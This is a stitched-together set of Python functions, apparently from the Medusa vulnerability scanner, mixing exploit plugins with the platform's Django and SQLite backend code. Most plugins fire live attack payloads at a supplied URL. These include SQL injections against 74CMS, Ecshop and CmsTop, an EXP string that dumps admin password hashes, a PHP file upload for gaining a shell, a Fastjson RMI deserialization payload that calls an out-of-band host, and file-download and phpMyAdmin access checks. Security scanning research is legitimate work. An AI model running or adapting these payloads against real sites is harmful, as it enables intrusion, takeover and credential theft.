def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_user.php?act=check_email" data = "email=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),2,1))>100 as signed) %23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = '/chanzhi/admin.php?m=package&f=upload' verify = '/chanzhi/system/tmp/package/php.php' payload_url = url + payload verify_url = url + verify data = """ ------WebKitFormBoundaryGgFOYWAluy1F8lvn Content-Disposition: form-data; name="file"; filename="php.php" Content-Type: text/php <?php echo md5(c);> ------WebKitFormBoundaryGgFOYWAluy1F8lvn-- """ requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) resp = requests.get(verify_url, headers=Headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在ChanZhiEPSGetShell漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/upload/admin/admin_baiduxml.php?ac=setsave' data = "xmlmax=1111&xmlpagesize=112&sunrain'=aaa" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("Error:Query error") != -1 and con.find( "value='aaa'") != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None: url = kwargs.get("Url") #获取传入的url参数 Headers = kwargs.get("Headers") #获取传入的头文件 proxies = kwargs.get("Proxies") #获取传入的代理参数 try: payload_url = url DL = Dnslog() # DL="777777777777.h3me6i.dnslog.cn" data = '''{ "a": { "@type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl" }, "b": { "@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "rmi://%s/Exploit", "autoCommit": true } } ''' % DL.dns_host() Headers['Content-Type'] = 'application/json' Headers["Connection"] = "close" resp = requests.post(payload_url, headers=Headers, data=data, proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code == 400: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'cookie': 'sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849") != -1: Medusa = "{}存在EasethinkCookie注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/upload/admin/admin_category.php?ac=edit_color_save' data = "val=xx&id=1 union select md5(c),2,3,4" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,md5(736482),3%23" #用EXP可以获取密码和账户 EXP = "/plus/ajax_common.php?act=hotword&query=錦'%20a<>nd%201=2%20un<>ion%20sel<>ect%201,group_concat(admin_name,0x3a,pwd,0x3a,pwd_hash),3%20fr<>om%20qs_admin%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find('5cee14937d463a819651c8e1c504613c') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def GenerateWord(request): #生成word文档报告 RequestLogRecord(request, request_api="generate_word") if request.method == "POST": try: #传入Sid和Token来进行创建任务 Sid = json.loads(request.body)["sid"] UserToken = json.loads(request.body)["token"] UserName = UserInfo().QueryUserNameWithToken( UserToken) # 如果登录成功后就来查询用户名 UserOperationLogRecord(request, request_api="generate_word", uid=UserName) if UserName != None: # 查到了UID VulnerabilityDataList, Url = MedusaQuery().QueryBySid( sid=Sid, uid=UserName) #查询漏洞列表和URL WordDownloadFileName = GenerateWordReport( VulnerabilityDataList=VulnerabilityDataList, target_url=Url) if WordDownloadFileName != None: ReportGenerationList().Write( sid=Sid, uid=UserName, file_name=WordDownloadFileName) #把相关数据写到数据库中 return JsonResponse({ 'message': WordDownloadFileName, 'code': 200, }) else: return JsonResponse({ 'message': '报告生成失败了!🐈', 'code': 404, }) except Exception as e: ErrorLog().Write("Web_Api_GenerateReport_GenerateWord(def)", e) return JsonResponse({ 'message': '莎酱被玩坏啦(>^ω^<)喵', 'code': 500, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/admin/affiliate_ck.php?act=list&auid=3+and+updatexml(1,concat(0x7e,concat(md5(c),0x3a,user()),0x7e),1)" data = "status=1&order_sn=2" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def DeleteProject(request): #用来删除用户的XSS项目 RequestLogRecord(request, request_api="delete_cross_site_script_project") if request.method == "POST": try: UserToken = json.loads(request.body)["token"] ProjectName = json.loads(request.body)["project_name"] Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名 if Uid != None: # 查到了UID UserOperationLogRecord( request, request_api="delete_cross_site_script_project", uid=Uid) Result = CrossSiteScriptProject().Delete( uid=Uid, project_name=ProjectName) # 查询项目信息 if Result: return JsonResponse({ 'message': "删除成功~", 'code': 200, }) else: return JsonResponse({ 'message': "项目删除失败!", 'code': 170, }) else: return JsonResponse({ 'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write( "Web_CrossSiteScriptHub_CrossSiteScript_DeleteProject(def)", e) return JsonResponse({ 'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)', 'code': 169, }) else: return JsonResponse({ 'message': '请使用Post请求', 'code': 500, })
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def UpdateShowName(request):#更新显示名字 RequestLogRecord(request, request_api="update_show_name") if request.method == "POST": try: Token=json.loads(request.body)["token"] NewShowName= json.loads(request.body)["new_show_name"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="update_show_name", uid=Uid) # 查询到了在计入 UpdateShowNameResult=UserInfo().UpdateShowName(uid=Uid,show_name=NewShowName)#获取值查看是否成功 if UpdateShowNameResult: return JsonResponse({'message': '好诶!修改成功~', 'code': 200, }) else: return JsonResponse({'message': "输入信息有误重新输入", 'code': 404, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_BasicFunctions_User_UpdateShowName(def)", e) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def UpdateKey(request):#更新Key RequestLogRecord(request, request_api="update_key") if request.method == "POST": try: Token=json.loads(request.body)["token"] NewKey= randoms().result(40)#生成随机的key,有可能会重复,这边先暂时不管了,这概论太j8低了 Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="update_key", uid=Uid) # 查询到了在计入 UpdateKeyResult=UserInfo().UpdateKey(uid=Uid,key=NewKey)#获取值查看是否成功 if UpdateKeyResult: return JsonResponse({'message': '呐呐呐呐!修改成功了呢~', 'code': 200, }) else: return JsonResponse({'message': "输入信息有误重新输入", 'code': 404, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_BasicFunctions_User_UpdateKey(def)", e) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def Creation(request):#创建生成项目 RequestLogRecord(request, request_api="create_email_project") if request.method == "POST": try: Token=json.loads(request.body)["token"] Uid = UserInfo().QueryUidWithToken(Token) # 如果登录成功后就来查询UID if Uid != None: # 查到了UID UserOperationLogRecord(request, request_api="create_email_project", uid=Uid) # 查询到了在计入 Key=randoms().result(10)#生成Key Result=EmailProject().Write(uid=Uid,project_key=Key) if Result: return JsonResponse({'message': Key, 'code': 200, }) else: return JsonResponse({'message': "创建失败!", 'code': 505, }) else: return JsonResponse({'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧", 'code': 403, }) except Exception as e: ErrorLog().Write("Web_Email_EmailProject_Creation(def)", e) else: return JsonResponse({'message': '请使用Post请求', 'code': 500, })
def VulnerabilityDistribution(self, **kwargs):#查询时间段中,漏洞分布,通过查询medusa表来获取所有个数 Uid = kwargs.get("uid") StartTime = kwargs.get("start_time") EndTime = kwargs.get("end_time") try: #查询时间段中数据分布 self.cur.execute("select timestamp from Medusa where uid =? and timestamp<=? and timestamp>=?", (Uid,EndTime,StartTime,)) CountDict = {} Tmp=[] for x in self.cur.fetchall():#先对数据进行提取 Tmp.append(x[0]) for i in set(Tmp):#在对数据进行统计 CountDict[i] = Tmp.count(i) #对数据进行排序 SortResult = sorted(CountDict.items(), key=lambda item: item[0]) return SortResult#直接返回数据 except Exception as e: ErrorLog().Write("Web_WebClassCongregation_HomeInfo(class)_TimeDistribution(def)", e) return None
def Query(self, **kwargs) -> bool or None: #查询该文件是否是该用户所有 Uid = kwargs.get("uid") FileName = kwargs.get("file_name") try: self.cur.execute( "select * from ReportGenerationList where file_name =? and uid=?", ( FileName, Uid, )) if self.cur.fetchall(): # 判断是否有数据 self.con.close() return True else: return False except Exception as e: ErrorLog().Write( "Web_WebClassCongregation_ReportGenerationList(class)_QueryTokenValidity(def)", e) return None
def TokenAuthentication( self, **kwargs: str ) -> bool or None: #查询用户Token是否存在,存在返回True,不存在返回False,报错返回None Token = kwargs.get("token") if Token != None: try: self.cur.execute("select * from UserInfo where token =?", (Token, )) if self.cur.fetchall(): # 判断是否有数据 self.con.close() return True else: return False except Exception as e: ErrorLog().Write( "Web_WebClassCongregation_UserInfo(class)_TokenAuthentication(def)", e) return None else: return False
def Monitor(): #用于监控系统信息 try: MemoryInfo = psutil.virtual_memory() # 获取完整内存信息 # 内存使用率 = (物理内存大小 - 可用内存大小) / 物理内存大小 * 100 MemoryUsed = MemoryInfo.total - MemoryInfo.available # 内存已使用 MemoryFree = MemoryInfo.available # 内存空闲大小 MemoryPercent = MemoryInfo.percent # 内存使用率 CentralProcessingUnitUsageRate = psutil.cpu_percent(1) #CUP总使用率 PerCoreCentralProcessingUnitUsageRate = psutil.cpu_percent( percpu=True) #每个CUP使用率 HardwareUsageRateInfo().Write( memory_free=MemoryFree, memory_percent=MemoryPercent, memory_used=MemoryUsed, central_processing_unit_usage_rate=CentralProcessingUnitUsageRate, per_core_central_processing_unit_usage_rate=str( PerCoreCentralProcessingUnitUsageRate)) #数据写到数据库中 except Exception as e: ErrorLog().Write("Web_SystemInfo_HardwareInfo_Monitor(def)", e)
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/?m=app&a=myapp&keyword=yu%'union select 1,2,3,4,md5(c),6,7,8,9,10,11,12,13,14,15,16,17#" payload_url = url + payload resp = requests.get(payload_url,headers=Headers, proxies=proxies,timeout=6, verify=False) con = resp.text code = resp.status_code if code==200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1 : Medusa = "{}存在EasyTalkSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(**kwargs)->None: url=kwargs.get("Url")#获取传入的url参数 Headers=kwargs.get("Headers")#获取传入的头文件 proxies=kwargs.get("Proxies")#获取传入的代理参数 url=PortReplacement(url,888) try: payload = '/pma/' payload_url = url + payload resp = requests.get(payload_url,headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("phpMyAdmin")!=-1 and con.find("sql")!=-1 and con.find("New")!=-1: Medusa = "{}存在宝塔面板未授权访问phpMyAdmin数据库漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format(url,payload_url,con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e) # 调用写入类传入URL和错误插件名
def __init__(self): self.con = sqlite3.connect(GetDatabaseFilePath().result()) # 获取所创建数据的游标 self.cur = self.con.cursor() # 创建表 try: self.cur.execute("CREATE TABLE OriginalProxyData\ (rid INTEGER PRIMARY KEY,\ uid TEXT NOT NULL,\ oid TEXT NOT NULL,\ creation_time TEXT NOT NULL,\ url TEXT NOT NULL,\ request_headers TEXT NOT NULL,\ request_date TEXT NOT NULL,\ request_method TEXT NOT NULL,\ issue_task_status TEXT NOT NULL)") except Exception as e: ErrorLog().Write( "Web_WebClassCongregation_OriginalProxyData(class)_init(def)", e)
def UpdateAvatar(self,**kwargs:str)->bool:#更新用户头像路径,True表示成功,False表示各失败 Uid = kwargs.get("uid") Avatar = kwargs.get("avatar") UpdateTime = str(int(time.time())) # 修改时间 if Uid!=None and Avatar!=None: try: self.cur.execute("""UPDATE UserInfo SET avatar = ?, avatar_update_time = ? WHERE uid= ?""", (Avatar,UpdateTime,Uid,)) # 提交 if self.cur.rowcount < 1: # 用来判断是否更新成功 self.con.commit() self.con.close() return False else: self.con.commit() self.con.close() return True except Exception as e: ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateImgPath(def)", e) return False else:return False
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml" payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find('log4jConfigLocation') != -1 : Medusa = "{}存在汇思软件任意文件下载漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def UpdateKey(self,**kwargs:str)->bool:#更新用户Key,True表示成功,False表示失败 Uid = kwargs.get("uid") Key= kwargs.get("key") UpdateTime = str(int(time.time())) # 修改时间 if Uid!=None and Key!=None: try: self.cur.execute("""UPDATE UserInfo SET key = ? , key_update_time = ? WHERE uid= ?""", (Key,UpdateTime,Uid,)) # 提交 if self.cur.rowcount < 1: # 用来判断是否更新成功 self.con.commit() self.con.close() return False else: self.con.commit() self.con.close() return True except Exception as e: ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateKey(def)", e) return False else:return False
def medusa( **kwargs) -> None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/ecshop/respond.php?code=alipay&subject=0&out_trade_no=%00′ and (select * from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,md5(c)) from ecs_admin_user limit 1))a from information_schema.tables group by a)b)" payload_url = url + payload resp = requests.get(payload_url,headers=Headers,timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33")!= -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def UpdateToken(self,**kwargs:str)->bool:#更新用户Token,True表示成功,False表示失败 Name = kwargs.get("name") Token= kwargs.get("token") UpdateTime = str(int(time.time())) # 修改时间 if Name!=None and Token!=None: try: self.cur.execute("""UPDATE UserInfo SET token = ? , token_update_time = ? WHERE name= ?""", (Token,UpdateTime,Name,)) # 提交 if self.cur.rowcount < 1: # 用来判断是否更新成功 self.con.commit() self.con.close() return False else: self.con.commit() self.con.close() return True except Exception as e: ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_UpdateToken(def)", e) return False else:return False
def __init__(self): self.con = sqlite3.connect(GetDatabaseFilePath().result()) # 获取所创建数据的游标 self.cur = self.con.cursor() # 创建表 try: self.cur.execute("CREATE TABLE UserOperationLog\ (id INTEGER PRIMARY KEY,\ uid TEXT NOT NULL,\ request_api TEXT NOT NULL,\ creation_time TEXT NOT NULL,\ header TEXT NOT NULL,\ request_ip TEXT NOT NULL,\ request_method TEXT NOT NULL,\ request_url TEXT NOT NULL,\ post_date TEXT NOT NULL)") except Exception as e: ErrorLog().Write( "Web_WebClassCongregation_UserOperationRecord(class)_init(def)", e)
def ForgetPassword(self,**kwargs):#忘记密码函数 Name = kwargs.get("name") NewPasswd=kwargs.get("new_passwd") Email=kwargs.get("email") UpdateTime = str(int(time.time())) # 修改时间 try: self.cur.execute("""UPDATE UserInfo SET passwd = ? , passwd_update_time = ? WHERE name= ? and email=?""", (NewPasswd, UpdateTime, Name,Email,)) # 提交 if self.cur.rowcount < 1:#用来判断是否更新成功 self.con.commit() self.con.close() return False else: self.con.commit() self.con.close() return True except Exception as e: ErrorLog().Write("Web_WebClassCongregation_UserInfo(class)_ForgetPassword(def)", e) return False
def medusa(**kwargs)->None: url = kwargs.get("Url") # 获取传入的url参数 Headers = kwargs.get("Headers") # 获取传入的头文件 proxies = kwargs.get("Proxies") # 获取传入的代理参数 try: payload = "/?app=vote&controller=vote&action=total&contentid=1 and 1=2 union select md5(c) from cmstop_admin where departmentid=2 limit 0,1;#" payload_url = url + payload resp = requests.get(payload_url, headers=Headers, timeout=6,proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1 : Medusa = "{}存在CmsTopSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, resp,**kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def Write(self,**kwargs):#写入相关信息,如果写入成功返回Sid值,如果失败返回None CreationTime = str(int(time.time())) # 创建时间 Uid=kwargs.get("uid") Url=kwargs.get("url") Proxy=kwargs.get("proxy") Status = kwargs.get("status") Module = kwargs.get("module") Process = kwargs.get("process") RedisId=""#先吧RedisID传空,后面在更新RedisID try: self.cur.execute("INSERT INTO ActiveScanList(uid,url,creation_time,proxy,status,process,module,redis_id)\ VALUES (?,?,?,?,?,?,?,?)",(Uid,Url,CreationTime,Proxy,Status,Process,Module,RedisId,)) # 提交 GetActiveScanId=self.cur.lastrowid # 获取主键的ID值,也就是active_scan_id的值 self.con.commit() self.con.close() return GetActiveScanId#获取主键的ID值,也就是sid的值 except Exception as e: ErrorLog().Write("Web_WebClassCongregation_ActiveScanList(class)_Write(def)", e) return None